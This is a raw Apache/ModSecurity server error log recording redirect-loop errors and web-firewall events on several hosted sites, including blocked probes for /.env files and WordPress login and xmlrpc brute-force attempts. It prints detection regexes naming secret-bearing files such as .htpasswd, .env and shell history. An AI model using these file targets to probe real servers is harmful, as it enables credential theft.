[Tue May 26 16:49:32.176992 2026] [core:error] [pid 823496:tid 823742] [client 5.255.99.53:47422] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.177012 2026] [core:error] [pid 823496:tid 823742] [client 5.255.99.53:47422] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.177905 2026] [core:error] [pid 823496:tid 823648] [client 5.255.99.53:47390] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.177922 2026] [core:error] [pid 823496:tid 823648] [client 5.255.99.53:47390] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.178751 2026] [core:error] [pid 817651:tid 817799] [client 5.255.99.53:47406] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.178767 2026] [core:error] [pid 817651:tid 817799] [client 5.255.99.53:47406] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.187213 2026] [core:error] [pid 817651:tid 817793] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.187229 2026] [core:error] [pid 817651:tid 817793] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.498814 2026] [security2:error] [pid 823496:tid 823694] [client 45.89.106.116:40844] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBw5a08mrtyBNpA4PdogAAAEI"]
[Tue May 26 16:49:32.525953 2026] [core:error] [pid 823496:tid 823683] [client 5.255.99.53:47466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.525970 2026] [core:error] [pid 823496:tid 823683] [client 5.255.99.53:47466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.552221 2026] [core:error] [pid 817651:tid 817824] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.552239 2026] [core:error] [pid 817651:tid 817824] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.553247 2026] [core:error] [pid 817651:tid 817882] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.553258 2026] [core:error] [pid 817651:tid 817882] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:32.952562 2026] [security2:error] [pid 823496:tid 823644] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBw5a08mrtyBNpA4PdnwAAABA"]
[Tue May 26 16:49:33.755697 2026] [core:error] [pid 823496:tid 823631] [client 5.255.99.53:47344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:33.755724 2026] [core:error] [pid 823496:tid 823631] [client 5.255.99.53:47344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:33.805677 2026] [core:error] [pid 823496:tid 823698] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:33.805699 2026] [core:error] [pid 823496:tid 823698] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:33.807148 2026] [core:error] [pid 823496:tid 823712] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:33.807170 2026] [core:error] [pid 823496:tid 823712] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:33.987696 2026] [security2:error] [pid 817651:tid 817884] [client 45.89.106.116:40856] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBxdlGRCPPN1dS2y29GAAAAOw"]
[Tue May 26 16:49:34.197290 2026] [core:error] [pid 823496:tid 823706] [client 5.255.99.53:47548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:34.197314 2026] [core:error] [pid 823496:tid 823706] [client 5.255.99.53:47548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:49:34.279196 2026] [security2:error] [pid 817651:tid 817884] [client 45.89.106.116:40856] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBxdlGRCPPN1dS2y29GAAAAOw"]
[Tue May 26 16:49:35.437999 2026] [security2:error] [pid 817651:tid 817845] [client 45.89.106.116:40862] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBx9lGRCPPN1dS2y29JgAAAMU"]
[Tue May 26 16:49:35.546923 2026] [security2:error] [pid 823496:tid 823660] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBxpa08mrtyBNpA4PdwgAAACA"]
[Tue May 26 16:49:35.745600 2026] [security2:error] [pid 817651:tid 817845] [client 45.89.106.116:40862] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBx9lGRCPPN1dS2y29JgAAAMU"]
[Tue May 26 16:49:37.187218 2026] [security2:error] [pid 823496:tid 823705] [client 45.89.106.116:40868] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWByZa08mrtyBNpA4Pd4wAAAE0"]
[Tue May 26 16:49:37.481138 2026] [security2:error] [pid 823496:tid 823705] [client 45.89.106.116:40868] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWByZa08mrtyBNpA4Pd4wAAAE0"]
[Tue May 26 16:49:37.578319 2026] [security2:error] [pid 817651:tid 817786] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBx9lGRCPPN1dS2y29KAAAAIo"]
[Tue May 26 16:49:37.645083 2026] [security2:error] [pid 817651:tid 817701] [remote 46.62.185.67:46050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWBydlGRCPPN1dS2y29LwAA9jE"]
[Tue May 26 16:49:38.616136 2026] [security2:error] [pid 823496:tid 823657] [client 45.89.106.116:57386] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBypa08mrtyBNpA4Pd-gAAAB0"]
[Tue May 26 16:49:38.911388 2026] [security2:error] [pid 823496:tid 823657] [client 45.89.106.116:57386] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBypa08mrtyBNpA4Pd-gAAAB0"]
[Tue May 26 16:49:39.207722 2026] [security2:error] [pid 823496:tid 823644] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWByZa08mrtyBNpA4Pd7AAAABA"]
[Tue May 26 16:49:40.051037 2026] [security2:error] [pid 823496:tid 823732] [client 45.89.106.116:57396] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBzJa08mrtyBNpA4PeFQAAAGg"]
[Tue May 26 16:49:40.377876 2026] [security2:error] [pid 823496:tid 823732] [client 45.89.106.116:57396] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBzJa08mrtyBNpA4PeFQAAAGg"]
[Tue May 26 16:49:40.658365 2026] [security2:error] [pid 817651:tid 817898] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBy9lGRCPPN1dS2y29RAAAAPo"]
[Tue May 26 16:49:41.547106 2026] [security2:error] [pid 823496:tid 823728] [client 45.89.106.116:57412] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBzZa08mrtyBNpA4PeMAAAAGQ"]
[Tue May 26 16:49:41.889480 2026] [security2:error] [pid 823496:tid 823656] [client 117.198.37.168:52310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBzZa08mrtyBNpA4PeNAAAABw"]
[Tue May 26 16:49:41.889590 2026] [security2:error] [pid 823496:tid 823656] [client 117.198.37.168:52310] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBzZa08mrtyBNpA4PeNAAAABw"]
[Tue May 26 16:49:41.929317 2026] [security2:error] [pid 823496:tid 823728] [client 45.89.106.116:57412] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBzZa08mrtyBNpA4PeMAAAAGQ"]
[Tue May 26 16:49:41.929386 2026] [security2:error] [pid 823496:tid 823728] [client 45.89.106.116:57412] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "virgence.com"] [uri "/wp-comments-post.php"] [unique_id "ahWBzZa08mrtyBNpA4PeMAAAAGQ"]
[Tue May 26 16:49:42.227193 2026] [security2:error] [pid 817651:tid 817819] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBzNlGRCPPN1dS2y29TQAAAKs"]
[Tue May 26 16:49:44.595746 2026] [security2:error] [pid 823496:tid 823642] [client 216.163.199.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWB0Ja08mrtyBNpA4PeUQAAAA4"], referer: https://www.anujtradingco.com/
[Tue May 26 16:49:44.808603 2026] [security2:error] [pid 823496:tid 823704] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBz5a08mrtyBNpA4PeRAAAAEw"]
[Tue May 26 16:49:45.640932 2026] [security2:error] [pid 817651:tid 817803] [client 5.255.99.53:56734] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB0dlGRCPPN1dS2y29fgAAAJs"]
[Tue May 26 16:49:45.989382 2026] [security2:error] [pid 823496:tid 823640] [client 216.163.199.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWB0Za08mrtyBNpA4PeYAAAAAw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1508425&moderation-hash=a97dd9bb5b364a3d346b85ce2fbcbce9
[Tue May 26 16:49:46.481495 2026] [security2:error] [pid 823496:tid 823668] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB0Za08mrtyBNpA4PeXAAAACg"]
[Tue May 26 16:49:46.650363 2026] [security2:error] [pid 823496:tid 823722] [client 176.65.139.234:34908] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahWB0pa08mrtyBNpA4PebQAAAF4"]
[Tue May 26 16:49:48.475314 2026] [security2:error] [pid 817651:tid 817875] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB09lGRCPPN1dS2y29lQAAAOM"]
[Tue May 26 16:49:48.735011 2026] [security2:error] [pid 823496:tid 823643] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB1Ja08mrtyBNpA4PejAAAAA8"]
[Tue May 26 16:49:50.269971 2026] [security2:error] [pid 823496:tid 823753] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB1Za08mrtyBNpA4PelgAAAH0"]
[Tue May 26 16:49:50.814875 2026] [security2:error] [pid 823496:tid 823683] [client 85.208.96.199:49572] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/gymnastics/list/"] [unique_id "ahWB1pa08mrtyBNpA4PexAAAADc"]
[Tue May 26 16:49:50.815038 2026] [security2:error] [pid 823496:tid 823683] [client 85.208.96.199:49572] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/gymnastics/list/"] [unique_id "ahWB1pa08mrtyBNpA4PexAAAADc"]
[Tue May 26 16:49:51.036367 2026] [security2:error] [pid 823496:tid 823655] [client 144.76.32.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB1Za08mrtyBNpA4PeogAAABs"]
[Tue May 26 16:49:52.057645 2026] [security2:error] [pid 823496:tid 823652] [client 117.198.37.168:52630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWB2Ja08mrtyBNpA4Pe3wAAABg"]
[Tue May 26 16:49:52.057774 2026] [security2:error] [pid 823496:tid 823652] [client 117.198.37.168:52630] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWB2Ja08mrtyBNpA4Pe3wAAABg"]
[Tue May 26 16:49:52.323103 2026] [security2:error] [pid 823496:tid 823688] [client 202.76.168.172:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB15a08mrtyBNpA4PeygAAADw"]
[Tue May 26 16:49:52.516587 2026] [security2:error] [pid 823496:tid 823664] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB15a08mrtyBNpA4PezgAAACQ"]
[Tue May 26 16:49:53.793880 2026] [security2:error] [pid 823496:tid 823655] [client 176.65.139.233:39276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "services.bloggertarget.com"] [uri "/.env"] [unique_id "ahWB2Za08mrtyBNpA4Pe_QAAABs"]
[Tue May 26 16:49:53.975225 2026] [security2:error] [pid 817651:tid 817785] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB2NlGRCPPN1dS2y29zwAAAIk"]
[Tue May 26 16:49:54.650785 2026] [security2:error] [pid 823496:tid 823645] [client 176.65.139.235:26440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "test.anujtradingco.com"] [uri "/.env"] [unique_id "ahWB2pa08mrtyBNpA4PfDwAAABE"]
[Tue May 26 16:49:54.661233 2026] [security2:error] [pid 817651:tid 817826] [client 176.65.139.229:17248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "greenfood.anujtradingco.com"] [uri "/.env"] [unique_id "ahWB2tlGRCPPN1dS2y295AAAALI"]
[Tue May 26 16:49:54.663078 2026] [security2:error] [pid 823496:tid 823752] [client 176.65.139.229:17232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "new.anujtradingco.com"] [uri "/.env"] [unique_id "ahWB2pa08mrtyBNpA4PfEAAAAHw"]
[Tue May 26 16:49:54.719453 2026] [security2:error] [pid 817651:tid 817782] [client 5.255.99.53:56734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.99.255.5.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWB2tlGRCPPN1dS2y295QAAAIY"]
[Tue May 26 16:49:56.136163 2026] [security2:error] [pid 823496:tid 823680] [client 5.255.99.53:40144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.99.255.5.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-login.php"] [unique_id "ahWB25a08mrtyBNpA4PfHQAAADQ"], referer: http://poonawallatennisacademy.com/wp-admin/
[Tue May 26 16:49:56.671899 2026] [security2:error] [pid 823496:tid 823674] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB3Ja08mrtyBNpA4PfKwAAAC4"]
[Tue May 26 16:49:56.775258 2026] [security2:error] [pid 817651:tid 817833] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB29lGRCPPN1dS2y297AAAALk"]
[Tue May 26 16:49:57.071036 2026] [security2:error] [pid 823496:tid 823699] [client 5.255.99.53:40222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWB3Za08mrtyBNpA4PfLgAAAEc"]
